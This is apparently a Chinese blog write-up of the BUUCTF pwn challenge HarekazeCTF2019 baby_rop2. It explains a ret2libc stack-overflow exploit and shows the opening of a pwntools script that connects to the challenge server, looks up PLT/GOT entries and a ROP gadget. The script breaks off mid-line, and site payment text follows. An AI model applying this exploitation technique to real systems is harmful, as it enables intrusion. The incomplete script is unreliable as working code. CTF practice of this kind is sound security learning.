BUUCTF-[HarekazeCTF2019]baby_rop2

本文详细介绍了一个名为BabyROP2的简单程序中的栈溢出漏洞的利用过程。通过使用ROP技术,文章展示了如何泄露libc基地址,计算system及/bin/sh地址,并最终获得shell的过程。

1.checksec

 

2.IDA

buf

 

很直接的栈溢出

ret2libc3

泄露libc基地址,计算system,bin/sh地址,覆盖返回地址 

还要注意64位传参,寄存器的使用

3.EXP

from pwn import * 
from LibcSearcher import LibcSearcher
#from LibcSearcherX import *
 
elf = ELF('./28babyrop2')
#libc = ELF("/root/Desktop/Pwn Subject/libc.so.6") 
io = remote("node4.buuoj.cn",26955)
#io = process("/root/Desktop/Pwn Subject/babyrop2")
 
# Get Pot and Got
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main = elf.symbols['main']
rdi = 0x0000000000400733
rsi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值